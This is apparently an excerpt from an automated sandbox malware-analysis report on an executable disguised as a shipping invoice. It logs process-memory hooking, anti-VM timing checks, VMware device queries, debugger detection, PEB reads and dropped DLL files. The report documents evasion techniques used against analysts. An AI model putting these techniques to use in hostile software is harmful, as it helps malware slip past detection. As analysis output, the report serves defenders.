Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 771133C0 value: E9 FB 6F 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 77114760 value: E9 2B 6B 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 770D6590 value: E9 0B 00 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 770DB510 value: E9 2B 53 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 770FC490 value: E9 0B 00 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 7711EE00 value: E9 E1 52 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 7711EFD0 value: E9 26 5B 00 00
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 6360 base: 77165050 value: E9 EB 61 FB FF
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 6360 base: 771650F0 value: E9 5B 61 FB FF
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 6360 base: 77165180 value: E9 9B 60 FB FF
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 6360 base: 77165190 value: E9 CB 60 FB FF
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 6360 base: 771651A0 value: E9 4B 60 FB FF
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 6360 base: 7717FEE0 value: E9 9B FF FF FF
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 6360 base: 771133C0 value: E9 FB 6F 00 00
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 6360 base: 77114760 value: E9 2B 6B 00 00
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 6360 base: 770D6590 value: E9 0B 00 00 00
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 6360 base: 770DB510 value: E9 2B 53 00 00
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 6360 base: 770FC490 value: E9 0B 00 00 00
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 6360 base: 7711EE00 value: E9 E1 52 00 00
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 6360 base: 7711EFD0 value: E9 26 5B 00 00
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 00000000004085C4 second address: 00000000004085CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 000000000040894E second address: 0000000000408954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000002F685C4 second address: 0000000002F685CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000002F6894E second address: 0000000002F68954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00408880 rdtsc 2_2_00408880
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dll
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dll
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dll
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\pkgs\rcxditui.dll
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exe
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796 Thread sleep time: -190000s >= -30000s
Source: C:\Windows\explorer.exe TID: 6744 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 2928 Thread sleep time: -42000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_00406469 FindFirstFileA,FindClose, 0_2_00406469
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_00402765 FindFirstFileA, 0_2_00402765
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_0040592E
Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000004.00000000.709985267.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.923834797.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.701787722.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000000.710156984.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000004.00000000.710616810.000000000A9CC000.00000004.00000001.sdmp Binary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI
Source: explorer.exe, 00000004.00000000.710247999.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\rundll32.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\cmd.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00408880 rdtsc 2_2_00408880
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00409AF0 LdrLoadDll, 2_2_00409AF0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_10004CBC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_10004CBC
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_1000734B LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 1_2_1000734B
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04C08CD6 mov eax, dword ptr fs:[00000030h] 2_2_04C08CD6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF14FB mov eax, dword ptr fs:[00000030h] 2_2_04BF14FB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B6BC2C mov eax, dword ptr fs:[00000030h] 2_2_04B6BC2C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h] 2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h] 2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h] 2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h] 2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h] 2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h] 2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h] 2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h] 2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h] 2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h] 2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h] 2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h] 2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h] 2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h] 2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04C0740D mov eax, dword ptr fs:[00000030h] 2_2_04C0740D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04C0740D mov eax, dword ptr fs:[00000030h] 2_2_04C0740D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04C0740D mov eax, dword ptr fs:[00000030h] 2_2_04C0740D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B5746D mov eax, dword ptr fs:[00000030h] 2_2_04B5746D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B635A1 mov eax, dword ptr fs:[00000030h] 2_2_04B635A1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h] 2_2_04B32D8A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h] 2_2_04B32D8A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h] 2_2_04B32D8A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h] 2_2_04B32D8A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h] 2_2_04B32D8A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BE8DF1 mov eax, dword ptr fs:[00000030h] 2_2_04BE8DF1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B3AD30 mov eax, dword ptr fs:[00000030h] 2_2_04B3AD30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B5C577 mov eax, dword ptr fs:[00000030h] 2_2_04B5C577
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B5C577 mov eax, dword ptr fs:[00000030h] 2_2_04B5C577
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B57D50 mov eax, dword ptr fs:[00000030h] 2_2_04B57D50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04C08D34 mov eax, dword ptr fs:[00000030h] 2_2_04C08D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B73D43 mov eax, dword ptr fs:[00000030h] 2_2_04B73D43
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04C08ED6 mov eax, dword ptr fs:[00000030h] 2_2_04C08ED6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BB46A7 mov eax, dword ptr fs:[00000030h] 2_2_04BB46A7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BCFE87 mov eax, dword ptr fs:[00000030h] 2_2_04BCFE87
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B616E0 mov ecx, dword ptr fs:[00000030h] 2_2_04B616E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04C00EA5 mov eax, dword ptr fs:[00000030h] 2_2_04C00EA5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04C00EA5 mov eax, dword ptr fs:[00000030h] 2_2_04C00EA5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04C00EA5 mov eax, dword ptr fs:[00000030h] 2_2_04C00EA5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B636CC mov eax, dword ptr fs:[00000030h] 2_2_04B636CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BEFEC0 mov eax, dword ptr fs:[00000030h] 2_2_04BEFEC0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BEFE3F mov eax, dword ptr fs:[00000030h] 2_2_04BEFE3F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B6E730 mov eax, dword ptr fs:[00000030h] 2_2_04B6E730
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B34F2E mov eax, dword ptr fs:[00000030h] 2_2_04B34F2E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B34F2E mov eax, dword ptr fs:[00000030h] 2_2_04B34F2E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04C08F6A mov eax, dword ptr fs:[00000030h] 2_2_04C08F6A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BCFF10 mov eax, dword ptr fs:[00000030h] 2_2_04BCFF10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BCFF10 mov eax, dword ptr fs:[00000030h] 2_2_04BCFF10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04C0070D mov eax, dword ptr fs:[00000030h] 2_2_04C0070D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04C0070D mov eax, dword ptr fs:[00000030h] 2_2_04C0070D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B4EF40 mov eax, dword ptr fs:[00000030h] 2_2_04B4EF40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B6F0BF mov ecx, dword ptr fs:[00000030h] 2_2_04B6F0BF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B6F0BF mov eax, dword ptr fs:[00000030h] 2_2_04B6F0BF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B6F0BF mov eax, dword ptr fs:[00000030h] 2_2_04B6F0BF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B790AF mov eax, dword ptr fs:[00000030h] 2_2_04B790AF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B39080 mov eax, dword ptr fs:[00000030h] 2_2_04B39080
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h] 2_2_04B4B02A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h] 2_2_04B4B02A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h] 2_2_04B4B02A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h] 2_2_04B4B02A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BB7016 mov eax, dword ptr fs:[00000030h] 2_2_04BB7016
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BB7016 mov eax, dword ptr fs:[00000030h] 2_2_04BB7016
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BB7016 mov eax, dword ptr fs:[00000030h] 2_2_04BB7016
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04C01074 mov eax, dword ptr fs:[00000030h] 2_2_04C01074
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF2073 mov eax, dword ptr fs:[00000030h] 2_2_04BF2073
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B6A185 mov eax, dword ptr fs:[00000030h] 2_2_04B6A185
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B5C182 mov eax, dword ptr fs:[00000030h] 2_2_04B5C182
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B3B1E1 mov eax, dword ptr fs:[00000030h] 2_2_04B3B1E1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B3B1E1 mov eax, dword ptr fs:[00000030h] 2_2_04B3B1E1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B3B1E1 mov eax, dword ptr fs:[00000030h] 2_2_04B3B1E1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h] 2_2_04B54120
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h] 2_2_04B54120
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h] 2_2_04B54120
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h] 2_2_04B54120
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B54120 mov ecx, dword ptr fs:[00000030h] 2_2_04B54120
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B39100 mov eax, dword ptr fs:[00000030h] 2_2_04B39100
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B39100 mov eax, dword ptr fs:[00000030h] 2_2_04B39100
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B39100 mov eax, dword ptr fs:[00000030h] 2_2_04B39100
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B3B171 mov eax, dword ptr fs:[00000030h] 2_2_04B3B171
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B3B171 mov eax, dword ptr fs:[00000030h] 2_2_04B3B171
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B5B944 mov eax, dword ptr fs:[00000030h] 2_2_04B5B944
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B5B944 mov eax, dword ptr fs:[00000030h] 2_2_04B5B944
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h] 2_2_04B352A5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h] 2_2_04B352A5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h] 2_2_04B352A5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h] 2_2_04B352A5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h] 2_2_04B352A5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B6D294 mov eax, dword ptr fs:[00000030h] 2_2_04B6D294
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B6D294 mov eax, dword ptr fs:[00000030h] 2_2_04B6D294
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BEB260 mov eax, dword ptr fs:[00000030h] 2_2_04BEB260
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BEB260 mov eax, dword ptr fs:[00000030h] 2_2_04BEB260
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h] 2_2_04B39240
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h] 2_2_04B39240
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h] 2_2_04B39240
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h] 2_2_04B39240
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF138A mov eax, dword ptr fs:[00000030h] 2_2_04BF138A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04C05BA5 mov eax, dword ptr fs:[00000030h] 2_2_04C05BA5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04C08B58 mov eax, dword ptr fs:[00000030h] 2_2_04C08B58
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF131B mov eax, dword ptr fs:[00000030h] 2_2_04BF131B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00800000 mov eax, dword ptr fs:[00000030h] 2_2_00800000
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00800CE4 mov edi, dword ptr fs:[00000030h] 2_2_00800CE4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00802C5D mov eax, dword ptr fs:[00000030h] 2_2_00802C5D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00804E70 mov eax, dword ptr fs:[00000030h] 2_2_00804E70
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03733B7A mov eax, dword ptr fs:[00000030h] 9_2_03733B7A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03733B7A mov eax, dword ptr fs:[00000030h] 9_2_03733B7A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0370DB60 mov ecx, dword ptr fs:[00000030h] 9_2_0370DB60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D8B58 mov eax, dword ptr fs:[00000030h] 9_2_037D8B58
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0370F358 mov eax, dword ptr fs:[00000030h] 9_2_0370F358
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0370DB40 mov eax, dword ptr fs:[00000030h] 9_2_0370DB40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C131B mov eax, dword ptr fs:[00000030h] 9_2_037C131B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h] 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h] 9_2_037303E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h] 9_2_037303E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h] 9_2_037303E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h] 9_2_037303E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h] 9_2_037303E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h] 9_2_037303E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037B23E3 mov ecx, dword ptr fs:[00000030h] 9_2_037B23E3
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037B23E3 mov ecx, dword ptr fs:[00000030h] 9_2_037B23E3
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037B23E3 mov eax, dword ptr fs:[00000030h] 9_2_037B23E3
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372DBE9 mov eax, dword ptr fs:[00000030h] 9_2_0372DBE9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037853CA mov eax, dword ptr fs:[00000030h] 9_2_037853CA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037853CA mov eax, dword ptr fs:[00000030h] 9_2_037853CA
